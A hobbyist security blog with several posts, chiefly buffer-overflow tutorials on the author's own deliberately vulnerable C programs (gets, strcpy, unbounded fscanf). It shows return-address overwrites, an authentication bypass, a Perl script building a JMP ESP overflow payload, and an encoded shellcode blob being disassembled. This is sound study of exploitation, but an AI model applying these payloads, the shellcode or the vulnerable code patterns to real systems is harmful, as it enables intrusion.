Posted by: nickfnord | January 24, 2009

My First Crackme

I wrote my first crackme this week.

it can be found here:
http://www.crackmes.de/users/nickfnord/nickfnords_keygenme_1/

here’s the description:

/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\
An experiment in obfuscation – by Nick Fnord
/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\

Date: 24-Jan-2009
Program Type: Console application
Crackme Type: KeygenMe/Analysis
Difficulty Level: I think this is a 3 or 4 but as it’s my first
crackme I’m unsure.
Programming Language: C++ with a bit of inline ASM
Platform: Only tested on WinXP but as I have included the
DLLs statically it should run on anything that
supports the PE format.

Hi All,

This is my first crackme. I made it as an exercise in obfuscation and also
to experiment with various anti-debugger techniques. I don’t think there
is a plug-in for Olly that successfully takes care of all the methods I used,
but if there is, I’d be interested to know about it.

The application will ask for a username and password, and if correct will
display a fairly well known poem.

Task One:
———
Your Primary task is to write a Keygen program for it. You are permitted to
do whatever you like to the original program.

Task Two:
———
Write a tutorial detailing how you went about making the keygen. Ideally,
describe the program in high-level pseudo-code or in words, identifying all the
anti-debugger methods used.

Hope you have many hours of enjoyment from this one.

Cheers!
Nick (NickNOSPAM[at]nickfnord[dot]com)

That pretty much sums it up. I’m quite interested to see what other people think about it and whether they rate the program higher or lower than the 3 I gave it. Most of it was written with a glass of http://www.woodfordreserve.com/Default.aspx at hand so it’s perhaps not the most efficient bit of code I’ve made, but still :-)

I offer a free cross link on this blog to the first person to crack it :-)

enjoy!

Posted by: nickfnord | December 9, 2008

Juvenile Shellcode

hmm – was practicing writing shellcode today and…

C:\stuff\C\fun>notepad fun.asm

section .text
global _start
_start:
mov al, 0xb

C:\stuff\C\fun>nasm fun.asm

C:\stuff\C\fun>ndisasm fun
00000000 B00B mov al,0xb

just imagine if they taught shellcode in junior high-school…

there you go – you know how they talk about those crazy people who can read hex opcodes? well, you’re one now because you’re not going to forget that mov al, 0xb is B00B.

Posted by: nickfnord | November 24, 2008

Assembly constructs (loops)

Differing constructs on different systems.

so just a quick one this time:

I’m going through the infosec institute’s reverse engineering course and one of the fundamental things that is being emphasised is the ability to quickly recognise program constructs within assembly. This allows you to quickly skim through a disassembled program and identify the important parts that need more attention rather than struggling to manually disassemble everything first time.

so it turns out that as is the case with most things, this is a skill that comes with much experience. as you encounter new situations you’ll learn how to better identify these sorts of things.

take for example this very simple program below. all it does is point every element of an array at an empty string, but when disassembled, the loop comes out three different ways depending on the compiler and the system.

here’s the original program:


int main()
{
char *array[50];
int i;

for (i=0;i<50;i++)
{
array[i] = "";
}
return 0;
}

compiled with lcc and disassembled with nasm on winXP creates a Do-While loop:


000006D4 push ebp ; set up frame
000006D5 mov ebp,esp ;
000006D7 sub esp,0xcc ; allocating space (204d)
000006DD push esi ;
000006DE push edi ;
000006DF mov dword [ebp-0x4],0x0 ; setting ebp-4 to 0 (ebp-4 = counter)
000006E6 mov edi,[ebp-0x4] ; placing counter into edi
000006E9 lea esi,[dword 0x4040a0] ; loading hard-coded value into esi
000006EF mov [ebp+edi*4-0xcc],esi ; inserting said value into array[edi]
000006F6 inc dword [ebp-0x4] ; increment counter
000006F9 cmp dword [ebp-0x4],byte +0x32 ; compare counter to 50
000006FD jl 0x6e6 ; return to start of loop if less than 50
000006FF mov eax,0x0 ; set up return value
00000704 pop edi ;
00000705 pop esi ;
00000706 leave ; clean up
00000707 ret ; return.

compiled with gcc and disassembled with gdb on redhat linux creates a While-Do loop:

main+0: push %ebp
main+1: mov %esp,%ebp
main+3: sub $0xe8,%esp
main+9: and $0xfffffff0,%esp
main+12: mov $0x0,%eax
main+17: add $0xf,%eax
main+20: add $0xf,%eax
main+23: shr $0x4,%eax
main+26: shl $0x4,%eax
main+29: sub %eax,%esp
main+31: movl $0x0,0xffffff24(%ebp) ; store 0 in the counter at ebp-0xdc
main+41: cmpl $0x31,0xffffff24(%ebp) ; start of loop, compare counter to 49
main+48: jg 0x8048381 main+77 ; if it is greater, jump to the end
main+50: mov 0xffffff24(%ebp),%eax ; stick counter into eax
main+56: movl $0x8048468,0xffffff28(%ebp,%eax,4) ; move constant value into ebp + eax * 4 (array[eax])
main+67: lea 0xffffff24(%ebp),%eax ; load the address of the counter into eax
main+73: incl (%eax) ; inc value pointed at by eax
main+75: jmp 0x804835d main+41 ; jump back to start
main+77: mov $0x0,%eax ; set up return value
main+82: leave ; clean up
main+83: ret ; return

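compiled with gcc and disassembled with gdb on backtrack3 (running in a virtual machine) creates a While-Do loop, but backwards: the test sits at the bottom and the code jumps straight to it.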

main+0: lea 0x4(%esp),%ecx
main+4: and $0xfffffff0,%esp
main+7: pushl 0xfffffffc(%ecx)
main+10: push %ebp
main+11: mov %esp,%ebp
main+13: push %ecx
main+14: sub $0xd0,%esp
main+20: movl $0x0,0xfffffff8(%ebp) ; set the counter at ebp-0x8 to 0
main+27: jmp 0x8048352 main+46 ; Jump straight to the compare
main+29: mov 0xfffffff8(%ebp),%eax ; start of loop - putting counter into eax
main+32: movl $0x8048448,0xffffff30(%ebp,%eax,4) ; move hardcoded value to array[eax]
main+43: incl 0xfffffff8(%ebp) ; increment the counter at ebp-0x8
main+46: cmpl $0x31,0xfffffff8(%ebp) ; compare this to 49
main+50: jle 0x8048341 main+29 ; go back to start if less than or equal to
main+52: mov $0x0, %eax ; set up return value
main+57: add $0xd0,%esp ; clean up
main+63: pop %ecx
main+64: pop %ebp
main+65: lea 0xfffffffc(%ecx),%esp
main+68: ret ; return

All of these do exactly the same thing, but are implemented in very different ways. It is important to be able to quickly recognise these structures and not be fooled just because something looks nonsensical; it’s probably just the compiler trying to do it better.

it’s all good fun anyway :-)

Posted by: nickfnord | November 13, 2008

supporting legacy code

so I’ve found that I have to do a bit of maintenance on a COBOL module at work…… I’ve been avoiding it but can’t any longer. I was actually kind of curious to see what it would be like and was kind of looking forward to it, but it seems that I was a fool.

here’s just a small snippet:

IF WH-CONDITION = "Y"
SET TRUE-CONDITION TO TRUE
ELSE
SET FALSE-CONDITION TO TRUE
END-IF.

*sigh*

Posted by: nickfnord | November 1, 2008

Overflows in Linux

My Brother bought me The Shellcoder’s Handbook as an early Christmas present and so I’ve been going through the first few chapters over the past few days. It is quite comprehensive and to my delight I found I don’t understand everything in it, which means I’m going to learn a lot as I go through it.

The first section deals with Linux, and explains that it is doing so because of the “solid, reliable, internal operating system structures” available to work with.

So I finally bit the bullet and decided to get used to using gdb. I generally dislike using command line programs of this sort, particularly after having used wonderful applications such as IDA Pro and OllyDbg, but after dragging myself kicking and screaming through a tutorial or two, I started to like it. I was also consoled by the fact that I found the vi syntax highlighting with the backtrack3 background to be damn sexy.

The following two programs are taken from the second chapter, with my own notes rather than word for word from the book. One reason is that I’ve found that the book has a few technical errors in it (which, in a way, is good because it means I have to understand what’s going on); the other is that I’m trying to solidify it in my own mind, and writing this helps.

sample program 1 (reproduced from the book):

#include <stdio.h>
#include <string.h>
void return_input(void)
{
char array[30];
gets(array); /* deliberately unsafe: no bounds check on the 30-byte buffer */
printf("%s\n", array);
}
int main(void)
{
return_input();
return 0;
}

so we compile this:

cc overflow.c -o overflow

and ignore the warning about the ‘gets’ function.

running it demonstrates that all it does is take some input and pump it out again:

bt temp # ./overflow
Hello World
Hello World
bt temp #

but what happens when we put in more than 30 characters?

bt temp # ./overflow
AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDDDDDDDD
AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDDDDDDDD
Segmentation fault
bt temp #

ok so just for kicks, we want to make the program display the input twice, so we open it up in gdb:

bt temp # gdb overflow
GNU gdb 6.6
Copyright (C) 2006 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i486-slackware-linux"...
Using host libthread_db library "/lib/libthread_db.so.1".

then we disassemble the main function:


(gdb) disas main
Dump of assembler code for function main:
0x080483aa <main+0>: lea 0x4(%esp),%ecx
0x080483ae <main+4>: and $0xfffffff0,%esp
0x080483b1 <main+7>: pushl 0xfffffffc(%ecx)
0x080483b4 <main+10>: push %ebp
0x080483b5 <main+11>: mov %esp,%ebp
0x080483b7 <main+13>: push %ecx
0x080483b8 <main+14>: sub $0x4,%esp
0x080483bb <main+17>: call 0x8048384 <return_input>
0x080483c0 <main+22>: mov $0x0,%eax
0x080483c5 <main+27>: add $0x4,%esp
0x080483c8 <main+30>: pop %ecx
0x080483c9 <main+31>: pop %ebp
0x080483ca <main+32>: lea 0xfffffffc(%ecx),%esp
0x080483cd <main+35>: ret
End of assembler dump.

and take note of the address where it is calling the return_input function (0x080483bb).

disassembling the return_input function gives us the following:

(gdb) disas return_input
Dump of assembler code for function return_input:
0x08048384 <return_input+0>: push %ebp
0x08048385 <return_input+1>: mov %esp,%ebp
0x08048387 <return_input+3>: sub $0x28,%esp
0x0804838a <return_input+6>: sub $0xc,%esp
0x0804838d <return_input+9>: lea 0xffffffe2(%ebp),%eax
0x08048390 <return_input+12>: push %eax
0x08048391 <return_input+13>: call 0x80482b0 <gets@plt>
0x08048396 <return_input+18>: add $0x10,%esp
0x08048399 <return_input+21>: sub $0xc,%esp
0x0804839c <return_input+24>: lea 0xffffffe2(%ebp),%eax
0x0804839f <return_input+27>: push %eax
0x080483a0 <return_input+28>: call 0x80482d0 <puts@plt>
0x080483a5 <return_input+33>: add $0x10,%esp
0x080483a8 <return_input+36>: leave
0x080483a9 <return_input+37>: ret
End of assembler dump.

note the two calls – one to gets and one to puts. set a breakpoint on the gets and at the ret command at the end of the function:

(gdb) break *0x08048391
Breakpoint 1 at 0x8048391
(gdb) break *0x080483a9
Breakpoint 2 at 0x80483a9

and execute

(gdb) run
Starting program: /temp/overflow

Breakpoint 1, 0x08048391 in return_input ()

now, we look back at the disassembly of the main function and note that the next instruction after calling return_input should be 0x080483c0.

at this point, because we are in the function return_input, the return address (the eip saved by the call) has been pushed to the stack. so we take a snapshot of the stack:

(gdb) x/20x $esp
0xbffff270: 0xbffff28a 0x00000000 0x00000000 0x08048310
0xbffff280: 0x00000000 0x0804958c 0xbffff298 0x0804828d
0xbffff290: 0xb7fc9ff4 0xb7fc8220 0xbffff2c8 0x080483f9
0xbffff2a0: 0xb7fc9ff4 0xbffff35c 0xbffff2b8 0x080483c0
0xbffff2b0: 0xb7ff3b90 0xbffff2d0 0xbffff328 0xb7ea1df8

and see that the saved eip (0x080483c0, the last word on the 0xbffff2a0 row, i.e. at 0xbffff2ac) is sitting there nicely, ready for us to overwrite.

hit continue:

(gdb) continue
Continuing.
AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDDDDDDDD
AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDDDDDDDD

Breakpoint 2, 0x080483a9 in return_input ()

so now we’re at the return command – lets take another look at the stack:

(gdb) x/20x $esp
0xbffff2ac: 0x44444444 0xb7004444 0xbffff2d0 0xbffff328
0xbffff2bc: 0xb7ea1df8 0xb8000ce0 0x080483e0 0xbffff328
0xbffff2cc: 0xb7ea1df8 0x00000001 0xbffff354 0xbffff35c
0xbffff2dc: 0xb8001890 0x00000000 0x00000001 0x00000001
0xbffff2ec: 0x00000000 0xb7fc9ff4 0xb8000ce0 0x00000000

you can see that the address at the top of the stack just prior to execution of the ret command is a whole bunch of D’s, 6 of them in fact, meaning that because we entered 10 in, the other four must have overwritten the EBP.

going back 4 bytes in the stack confirms it:

(gdb) x/20x 0xbffff2a8
0xbffff2a8: 0x44444444 0x44444444 0xb7004444 0xbffff2d0

and continuing again confirms the overwrite of the return address:

(gdb) continue
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x44444444 in ?? ()

so in any case, now we want to overwrite the saved EIP with the address of the call to return_input in main (0x080483bb, noted earlier) to make the program echo its input twice. we can use the printf command to send the non-printable characters to the overflow program. we want to fill up the buffer (AAAAAAAAAABBBBBBBBBBCCCCCCCCCC), overwrite the pushed ebp (DDDD) and then overwrite the return address with that address, written least significant byte first because x86 is little-endian.

bt temp # printf "AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDD\xbb\x83\x04\x08" | ./overflow
AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDD»
AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDDÀ

Now here, in The Shellcoder’s Handbook, is an example of one of the three or so errors I’ve encountered in this chapter alone: the line in the book prints 6 D’s and not 4, causing the return address to contain 2 D’s rather than the address we passed in. I don’t really know what happened to the proofreading, but it’s a good feeling to understand what is wrong with their examples and to be able to correct it, so perhaps they put them in deliberately. (I just hope that I’m able to pick these things up as the book gets more advanced.)

The book goes on to explain that we don’t necessarily always want to spawn a shell with our shellcode; sometimes exploiting the program within itself is enough. In fact it mentions that many defenses against buffer overflows are rendered useless if the attacker uses the functionality of the program to achieve their goals. So the next example uses a buffer overflow to bypass authentication:

Here I haven’t reproduced their code at all; because I wanted to practice by myself, I wrote my own program that does basically the same thing. This is based on the helloworld4 program from a previous blog.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>

/* generate the expected password: C = p + k (mod 26), with k cycling through the key */
void keygen(char p[], char c[])
{
    int i, j;
    char key[] = "NICKFNORD";
    for (i = 0, j = 0; i < strlen(p); i++, j++)
    {
        if (j >= strlen(key))
        {
            j = 0;
        }
        c[i] = ((toupper(p[i]) - 65 + key[j] - 65) % 26 + 65);
    }
}

int get_username_password()
{
    char username[50];
    char password[50];
    char correctp[50];
    int i;

    /* zero the buffers (the original assigned "" here, which stores part of a pointer, not a NUL) */
    for (i = 0; i < 50; i++)
    {
        correctp[i] = '\0';
        password[i] = '\0';
        username[i] = '\0';
    }

    printf("Enter Username:\n");
    fscanf(stdin, "%s", username); /* deliberately unbounded: this is the overflow */
    printf("Enter Password:\n");
    fscanf(stdin, "%s", password);
    /* username and password must each be at least 8 characters */
    if (strlen(username) < 8 || strlen(password) < 8)
    {
        printf("invalid username/password combination");
        return 0;
    }

    keygen(username, correctp);

    if (strcmp(correctp, password) == 0)
    {
        return 1;
    }
    else
    {
        return 0;
    }
}

void do_valid_stuff()
{
    printf("Wooo - The username and password are correct!\n exiting\n\n");
    exit(0);
}

void do_invalid_stuff()
{
    printf("Danger Danger will robinson!!!\n\n");
    exit(1);
}

int main(void)
{
    if (get_username_password())
    {
        do_valid_stuff();
    }
    else
    {
        do_invalid_stuff();
    }
    return 0;
}

and run it:

bt temp # serial
Enter Username:
AAAAAAAAAA
Enter Password:
BBBBBBBBBB
Danger Danger will robinson!!!

Awwwwww, we suck….

So the idea with this one is that we redirect the program flow to the do_valid_stuff() function. we know that there’s no validation on the input length so if we send through enough characters it will overflow.

first we find the address of the call to do_valid_stuff:

(gdb) disas main
Dump of assembler code for function main:
0x080486b0 <main+0>: lea 0x4(%esp),%ecx
0x080486b4 <main+4>: and $0xfffffff0,%esp
0x080486b7 <main+7>: pushl 0xfffffffc(%ecx)
0x080486ba <main+10>: push %ebp
0x080486bb <main+11>: mov %esp,%ebp
0x080486bd <main+13>: push %ecx
0x080486be <main+14>: sub $0x4,%esp
0x080486c1 <main+17>: call 0x804851c <get_username_password>
0x080486c6 <main+22>: test %eax,%eax
0x080486c8 <main+24>: je 0x80486d1 <main+33>
0x080486ca <main+26>: call 0x8048670 <do_valid_stuff>
0x080486cf <main+31>: jmp 0x80486d6 <main+38>
0x080486d1 <main+33>: call 0x8048690 <do_invalid_stuff>
0x080486d6 <main+38>: mov $0x0,%eax
0x080486db <main+43>: add $0x4,%esp
0x080486de <main+46>: pop %ecx
0x080486df <main+47>: pop %ebp
0x080486e0 <main+48>: lea 0xfffffffc(%ecx),%esp
0x080486e3 <main+51>: ret
End of assembler dump.

so we find we want to redirect to 0x080486ca.

then we ensure that our core will be dumped if there’s a segmentation fault:

ulimit -c unlimited

and send through a long series of characters:

bt temp # printf "AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDDDDDDDDEEEEEEEEEEAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJ" | ./serial
Enter Username:
Enter Password:
Segmentation fault (core dumped)

bt temp # gdb -q -c core
(no debugging symbols found)
Using host libthread_db library "/lib/libthread_db.so.1".
Core was generated by `./serial'.
Program terminated with signal 11, Segmentation fault.
#0 0x45454545 in ?? ()

so we know that the return address is being overwritten by four of our E’s, which we can replace with the address we want

or we could have used the debugger of course and put a break point on the return command of the get_username_password function and then dumped the stack:

0x0804866b <get_username_password+335>: mov 0xfffffffc(%ebp),%edi
0x0804866e <get_username_password+338>: leave
0x0804866f <get_username_password+339>: ret
End of assembler dump.

(gdb) break *0x0804866f
Breakpoint 1 at 0x804866f
(gdb) run
Starting program: /temp/serial
Enter Username:
AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDDDDDDDDEEEEEEEEEEAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJ
Enter Password:
asdfasdfasdf

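Breakpoint 1, 0x0804866f in get_username_password ()
(gdb) x/4x $esp
0xbffff31c: 0x45454545 0x46464646 0x47474747 0x48484848

demonstrating that at the return command, the word on top of the stack is EEEE, followed by FFFF, GGGG and HHHH, so it is the EEEE group near the end of our input (66 bytes in) that lands on the return address.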

and so we modify our call to the program:

bt temp # printf "AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDDDDDDDDEEEEEEEEEEAAAABBBBCCCCDDDD\xca\x86\x04\x08" | ./serial
Enter Username:
Enter Password:
Wooo - The username and password are correct!
exiting


…and so we’ve redirected the program flow and have accessed a “secure” area of the program – yay for us.

of course, this isn’t really all that impressive in the scheme of things – I just wanted to demonstrate (to myself if no one else) the use of gdb. and writing this helps solidify this in my mind.

As it says in The Shellcoder’s Handbook: “Now it is time to do something useful with the vulnerability you exploited earlier. Forcing overflow.c to ask for input twice instead of once is a neat trick, but hardly something you would want to tell your friends about – ‘Hey, guess what, I caused a 15 line C program to ask for input twice!’ No, we want you to be cooler than that.”

yes, well – coolness levels increasing ever so slightly.

Posted by: nickfnord | October 30, 2008

decoding shellcode

Just a quick post – want to find out what shellcode actually does?  pump it out to a file like so:

#!/usr/local/bin/perl
$shellcode .=  #164 bytes
"\x2b\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xe2".
"\x61\xf1\x91\x83\xeb\xfc\xe2\xf4\x1e\x89\xb5\x91\xe2\x61\x7a\xd4".
"\xde\xea\x8d\x94\x9a\x60\x1e\x1a\xad\x79\x7a\xce\xc2\x60\x1a\xd8".
"\x69\x55\x7a\x90\x0c\x50\x31\x08\x4e\xe5\x31\xe5\xe5\xa0\x3b\x9c".
"\xe3\xa3\x1a\x65\xd9\x35\xd5\x95\x97\x84\x7a\xce\xc6\x60\x1a\xf7".
"\x69\x6d\xba\x1a\xbd\x7d\xf0\x7a\x69\x7d\x7a\x90\x09\xe8\xad\xb5".
"\xe6\xa2\xc0\x51\x86\xea\xb1\xa1\x67\xa1\x89\x9d\x69\x21\xfd\x1a".
"\x92\x7d\x5c\x1a\x8a\x69\x1a\x98\x69\xe1\x41\x91\xe2\x61\x7a\xf9".
"\xde\x3e\xc0\x67\x82\x37\x78\x69\x61\xa1\x8a\xc1\x8a\x91\x7b\x95".
"\xbd\x09\x69\x6f\x68\x6f\xa6\x6e\x05\x02\x90\xfd\x81\x4f\x94\xe9".
"\x87\x61\xf1\x91";

open (FILE, ">shellcode.bin");
binmode(FILE); # write raw bytes, no newline translation (matters on Windows)
print FILE $shellcode;
close(FILE);

then disassemble with ndisasm (part of nasm):

ndisasm -b 32 shellcode.bin > shellcode.asm

and you’ll get a file with the assembly:

00000000  29C9              sub ecx,ecx
00000002  83E9DD            sub ecx,byte -0x23
00000005  D9EE              fldz
00000007  D97424F4          fnstenv [esp-0xc]
0000000B  5B                pop ebx
0000000C  817313CAC57A1A    xor dword [ebx+0x13],0x1a7ac5ca
00000013  83EBFC            sub ebx,byte -0x4
00000016  E2F4              loop 0xc
00000018  362D3E1ACAC5      ss sub eax,0xc5ca1a3e
0000001E  F1                int1
0000001F  5F                pop edi
00000020  F6                db 0xF6
00000021  4E                dec esi
00000022  06                push es
00000023  1F                pop ds
00000024  B2C4              mov dl,0xc4
00000026  95                xchg eax,ebp
00000027  91                xchg eax,ecx
00000028  85DD              test ebp,ebx
0000002A  F1                int1
0000002B  45                inc ebp
0000002C  EAC4915341F1F1    jmp dword 0xf1f1:0x415391c4
00000033  1B24F4            sbb esp,[esp+esi*8]
00000036  BA836641BA        mov edx,0xba416683
0000003B  6E                outsb
0000003C  CD04              int 0x4
0000003E  B017              mov al,0x17
00000040  CB                retf
00000041  07                pop es
00000042  91                xchg eax,ecx

etc.

or you can let IDA work its magic on the .bin file, which provides a bit more analysis.

…contributions are welcome for the “buy Nick IDAPro” fund.

another quick note – I’ve posted a question over at the ethical hacker forums - I’ll post the results here when they come through.

Posted by: nickfnord | October 17, 2008

Buffer overflow basics part 1

I’ve become fairly distracted over the past few weeks and never ended up finishing the previous train of blogging.  That’s partly because I hit a wall when trying to make a keygen for the program in the previous blog (by extracting the relevant assembly code), and partly because I’ve found myself easily distracted by other things, such as understanding buffer overflows of varying complexity, setting up a VMware environment (still haven’t got it configured properly…) and setting up a web server for web app testing (that one was fairly straightforward, thankfully).  There’s so much to learn and to do, and most of it is far more interesting than learning about breaking protection.

But mostly I found this article, which sort of took the wind out of me a little bit:  http://www.ethicalhacker.net/content/view/152/2/  It is absolutely brilliant, a very clear and concise introduction to reversing.  It was very encouraging to see that the author took a similar approach to what I did (or the other way around), which means I’m on the right track, but his article is written with so much more background knowledge that it makes mine look pathetic :-)   So I have sort of been reluctant to post anything new really.

However, taking heart in the fact that I never promised this blog to be anything except me fumbling my way through a torrent of information, I now present:

Buffer overflow basics:

Below is the code for overflowme.c:  Sorry for the array intro there – it’s necessary for the moment to make the stack large enough for our shellcode – more detail at the end and in the next post.

#include <stdio.h>
#include <string.h>
void copyme(char *input)
{
char name[256];

strcpy(name,input); /* deliberately unbounded: this is the overflow */
}

int main(int argc, char **argv)
{
char intro[] = "Hello and welcome to buffer overflow basics, this character array really does have a purpose, it will be explained later, in reallity it is a bit of a hack but it will be used to demonstrate something later on";
printf("%s",intro);
copyme(argv[1]);
return 0;
}

Buffer overflows occur when data moved into a variable on the stack continues past the bounds of the variable. For example, the function copyme in the above code declares a variable “name” as an array of char with 256 elements.  When the program runs, it will allocate 256 bytes on the stack when entering the function.   The strcpy function will then copy the input from the command line into the name variable.

Let’s have a quick peek at the program in ollydbg.  You can apply command line arguments to your olly session by going to Debug->Arguments.  Alternatively, you can get Perl (download and install activePerl if you don’t have it already) to do it for you, which I have found quite a bit easier seeing as we’ll be using Perl to write shellcode later on.  The following Perl script will execute Olly (change the path to olly to suit yours of course), attach it to the overflowme executable and pass “Hello” in as a command line parameter:

#!/usr/local/bin/perl
$buffer = "Hello";
exec "c:\\stuff\\tools\\odbg110\\ollydbg ./overflowme.exe \"$buffer\"";

as you step through the program, you can see that the call to our copyme function is here:


0040132B   |.  E8 A4FFFFFF       CALL overflow.004012D4

the whole function looks like this:

004012D4   /$  55                PUSH EBP
004012D5   |.  89E5              MOV EBP,ESP
004012D7   |.  81EC 00010000     SUB ESP,100
004012DD   |.  57                PUSH EDI
004012DE   |.  FF75 08           PUSH [ARG.1]
004012E1   |.  8DBD 00FFFFFF     LEA EDI,[LOCAL.64]
004012E7   |.  57                PUSH EDI
004012E8   |.  E8 482E0000       CALL overflow.00404135
004012ED   |.  83C4 08           ADD ESP,8
004012F0   |.  5F                POP EDI                     ;overflow.00401330
004012F1   |.  C9                LEAVE
004012F2   \.  C3                RETN

If you pay close attention to the stack at this point, you’ll notice that as the function is called, the instruction address immediately after the CALL command is pushed onto the stack (in our case 00401330).  This is called the return address and it is what the program will use to return to the main part of the program after calling the function.

onto the function:

The first thing that most functions do is called the “prolog”.  It pushes EBP onto the stack and moves ESP into EBP.  Generally this means that all function parameters will be referred to as EBP+X and all local variables will be referred to as EBP-X.  The function then allocates the necessary space required for local variables by moving the stack pointer the appropriate number of bytes (100 in hex = 256 bytes, the size of our name variable).

The CALL line at 004012E8 is our strcpy function.

Stepping into this section, you can see that it prepares itself for the place where it copies the input string:

00404152   |.  F3:A4             REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[ESI]

This (as we found out in the binary analysis part II blog ) uses the register ECX as a counter and increments EDI and ESI.  At this point you can see that the ECX register is 6, which is our “Hello” string plus room for a null character on the end, and we can now see that our string has been copied onto the stack:

0012FD88   6C6C6548  Hell
0012FD8C   8A43006F  o.CŠ

finishing up, the function does everything in reverse: it pops EDI and then executes the LEAVE command, which undoes the prolog. LEAVE is equivalent to:

MOV ESP,EBP
POP EBP

(the MOV discards the 100h bytes of locals in one go, so no separate ADD ESP,100 is needed.)

At this point, you’ll notice that the address at the top of the stack is the return pointer that we mentioned previously and is pointing to the 00401330 address immediately after the call to the function:


0012FE8C   00401330  0@.  RETURN to overflow.00401330 from overflow.004012D4

We hit F8 again and the EIP now contains 00401330 and we’ve returned to the calling block.

But there is absolutely nothing stopping us passing in 257 or more characters and causing strcpy() to faithfully copy whatever we tell it to into the name array, despite the fact the program only allocates 256 bytes.

Let’s try it:

#!/usr/local/bin/perl
$buffer = "A"x300;

exec "c:\\stuff\\tools\\odbg110\\ollydbg ./overflowme.exe \"$buffer\"";

If we run this perl script and step through the program again, we’ll come to the REP MOVS copy command again and will note that the ECX register is set to 12D (or 301 bytes), which is the length of our input plus one for a null byte at the end.

So we know that this will write past the allocated space of 256 bytes – it causes our buffer to look like this:

0012FD84   00144C48  HL.
0012FD88   41414141  AAAA
0012FD8C   41414141  AAAA
0012FD90   41414141  AAAA
0012FD94   41414141  AAAA
0012FD98   41414141  AAAA
0012FD9C   41414141  AAAA
..
..
0012FE88   41414141  AAAA
0012FE8C   41414141  AAAA
0012FE90   41414141  AAAA
0012FE94   41414141  AAAA
etc.

and as we continue to step through, we get to the RETN command and find that our return address has been overwritten by “41414141”!  We step again and Olly reports an error; if we pass the error to the program (shift+F9) we get a segmentation fault (an access violation, in Windows terms).  This means that the application tried to execute a bit of memory that it did not have permission to access.  (This is a feature of modern processors running in protected mode: http://en.wikipedia.org/wiki/Protected_mode)

What we realise here is that the processor was trying to execute instructions contained at the address 41414141, an address that the user passed to it!

What if, instead of sending through a bunch of A’s, we could send through our own code, then cause the program to start executing it by pointing the return address into our code!  we could then cause the program to do whatever we wanted it to!

So the first thing to do is identify exactly which part of our input string overwrites the return address.  Mostly we do this by a series of educated guesses.   We know that the allocated buffer is 256 bytes long and we know that at the point the program subtracts the allocated space from the stack pointer, the stack looks like this:

0012FE88  /0012FF70  pÿ.
0012FE8C  |00401330  0@.  RETURN to overflow.00401330 from overflow.004012D4
0012FE90  |00144B55  UK.  ASCII "Hello"
0012FE94  |7C910208  ‘|  ntdll.7C910208

that is, it will always have the previous stack frame pointer pushed on top of the return address – so we can take a guess that to overwrite the return address exactly, we’ll need 256 A’s to fill the buffer, 4 more to fill the space where ebp was pushed and then we can overwrite the return address.

so here’s our attempted perl script:

#!/usr/local/bin/perl
$buffer = "A"x256;  #fills up the variable space
$buffer .= "A"x4;    #should overwrite the ebp address
$buffer .= "B"x4;    #should overwrite the return address with 42424242
$buffer .= "C"x100;  #if return address = 43434343 then we've padded too much

exec "c:\\stuff\\tools\\odbg110\\ollydbg ./overflowme.exe \"$buffer\"";

and it turns out it’s exactly where we expected it to be!  Now, if the size of the allocated space was not a multiple of 4, we would possibly have to compensate with between 1 and 3 bytes of padding to get it exactly spot on, but in this case we don’t need to worry about it.

if we have a quick look at the process in Olly – we’ll see the stack looks something like this:

0012FE84   41414141  AAAA
0012FE88   41414141  AAAA
0012FE8C   42424242  BBBB  ;this is our return address
0012FE90   43434343  CCCC
0012FE94   43434343  CCCC

So now we know we can overwrite the return address at will, and by doing so can cause the program to execute whatever code is at the address we point to.

So, we just need to point it to the address 0012FE90, right?  That way, we can pass in some instructions instead of a whole bunch of C’s and the computer will execute them?  Yes, but the problem we face here is that this address contains a null byte (the 00).  When strcpy() encounters a null byte, it will stop copying!  This means that although we can change the address alright, we would not then be able to include any code following it.

In this particular program, there are two solutions to this:

We can place our code prior to the return address (this is only possible if the allocated space is large enough for our code, which is not always the case), or we can take note of the fact that as soon as the program flow goes to the return address, the ESP register will be pointing at the top of the stack, where our C’s start.  So what we need to do is find a memory address that does not have any null bytes in it and that holds the instruction JMP ESP or CALL ESP.  We then replace the return address with this address and the program flow will start executing our user input.

This is where OllyUni comes in.  OllyUni is an add-on to Ollydbg that allows searching for certain commands in all the memory executable by the current process.  Just google for it and place the .dll file in your Olly directory.

Once you’ve got OllyUni in, restart Ollydbg and right-click in the execution window->overflow return address->ASCII overflow returns->JMP/CALL ESP.  Depending on the speed of your computer this may take a while.

It should come back in time with a message saying it’s found some addresses:

Awesome! View->Log

Pick an address that does not have 00 in it.  For our purposes, we’re going for “7C86467B”.

Now we place that in our perl script:

#!/usr/local/bin/perl
$buffer = "A"x256;  #fills up the variable space
$buffer .= "A"x4;   #should overwrite the ebp address
$buffer .= "\x7B\x46\x86\x7C";   #should overwrite the return address with 7C86467B
$buffer .= "C"x100;  #filler that ESP will point at once the RETN has run

exec "c:\\stuff\\tools\\odbg110\\ollydbg ./overflowme.exe \"$buffer\"";

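Note that the address bytes are written “backwards”.  This is because x86 is little-endian: the least significant byte of a 32-bit value is stored at the lowest memory address, so the bytes have to appear in our string in the reverse of the order we read them.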

Now run it just for kicks…

Our stack, as expected, looks like this:

0012FE84   41414141  AAAA
0012FE88   41414141  AAAA
